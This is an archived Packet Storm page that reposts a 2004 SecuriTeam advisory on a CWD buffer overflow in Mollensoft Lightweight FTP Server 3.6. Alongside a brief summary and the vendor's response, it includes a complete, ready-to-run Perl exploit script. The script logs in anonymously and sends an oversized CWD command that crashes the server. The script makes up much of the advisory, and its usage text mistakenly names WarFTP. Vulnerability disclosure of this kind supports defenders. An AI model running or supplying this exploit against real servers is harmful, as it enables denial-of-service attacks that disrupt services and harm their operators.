exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

mollensoftLightweight.txt

mollensoftLightweight.txt
Posted Jun 2, 2004
Authored by storm | Site SecuriTeam.com

A security vulnerability have been discovered in the Mollensoft Lightweight FTP Server version 3.6. A buffer overflow can be committed via the CWD command allowing for a denial of service attack. Full exploitation included.

tags | exploit, denial of service, overflow
SHA-256 | d385d01918e8b2f0b34b19abfd1352e1046ba16693a27f7ebf3d858884a130cf

mollensoftLightweight.txt

Change Mirror Download
Mollensoft Lightweight FTP Server CWD Buffer Overflow 
------------------------------------------------------------------------


Article reference:
http://www.securiteam.com/windowsntfocus/5RP0L15CUM.html


SUMMARY

STORM has discovered a security vulnerability in
<http://www.mollensoft.com/product2.htm> Mollensoft Lightweight FTP Server.
Mollensoft Lightweight FTP Server's support for the CWD command incorrectly
verifies that the buffer the CWD command doesn't overflow any of its internal
buffers. This insufficient verification allows an authenticated (anonymous or
otherwise) user to cause the FTP server to crash while trying to read an
arbitrary memory location by issuing a malformed CWD command.


DETAILS

Vulnerable Systems:
* Mollensoft Lightweight FTP Server version 3.6

Vendor Response:
BigAl (author) responded with the following:
I wrote this particular app with Visual Basic and used an FTP ActiveX COM
component and I am waiting for the component creator to get back to me
regarding the fix. Unfortunately I cannot snip off any of the commands, as
access to the command length is not available from the VB component using
straight VB Code. I am working on moving to .Net so hopefully I can have a
new FTP server out by fall time frame which is truly multi-threaded and
totally coded by me.

Exploit:
#!/usr/bin/perl
#
# Mollensoft FTP Server CMD Buffer Overflow
#
# Orkut users? Come join the SecuriTeam community
# http://www.orkut.com/Community.aspx?cmm=44441

use strict;
use IO::Socket::INET;

usage() unless (@ARGV == 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

$socket->autoflush(1);

# receive greeting
my $repcode = "220 ";
my $response = recv_reply($socket, $repcode);
print $response;

# send USER command
#my $username = "%00" x 2041;
my $username = "anonymous";
print "USER $username\r\n";
print $socket "USER $username\r\n";

select(undef, undef, undef, 0.002); # sleep of 2 milliseconds

# send PASS command
my $password = "a\@b.com";
print "PASS $password\r\n";
print $socket "PASS $password\r\n";

my $cmd = "CWD ";
$cmd .= "A" x 224; # Value can range from 224 to 1018
$cmd .= "\r\n";
print "length: ".length($cmd)."\n";
print $socket $cmd;

$repcode = "";
recv_reply($socket, $repcode);

close($socket);
exit(0);

sub usage
{
# print usage information
print "\nUsage: Mollensoft_FTP_Server_crash.pl <host> <port>\n
<host> - The host to connect to
<port> - The TCP port which WarFTP is listening on\n\n";
exit(1);
}

sub recv_reply
{
# retrieve any reply
my $socket = shift;
my $repcode = shift;
$socket or die "Can't receive on socket\n";

my $res="";
while(<$socket>)
{
$res .= $_;
if (/$repcode/) { last; }
}
return $res;
}


ADDITIONAL INFORMATION
SecurITeam would like to thank <mailto:storm@securiteam.com> STORM for
finding this vulnerability.


Regards,
Aviram Jenik
Beyond Security Ltd.

http://www.BeyondSecurity.com
http://www.SecuriTeam.com

The First Integrated Network and Web Application Vulnerability Scanner:
http://www.beyondsecurity.com/webscan-wp.pdf




====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close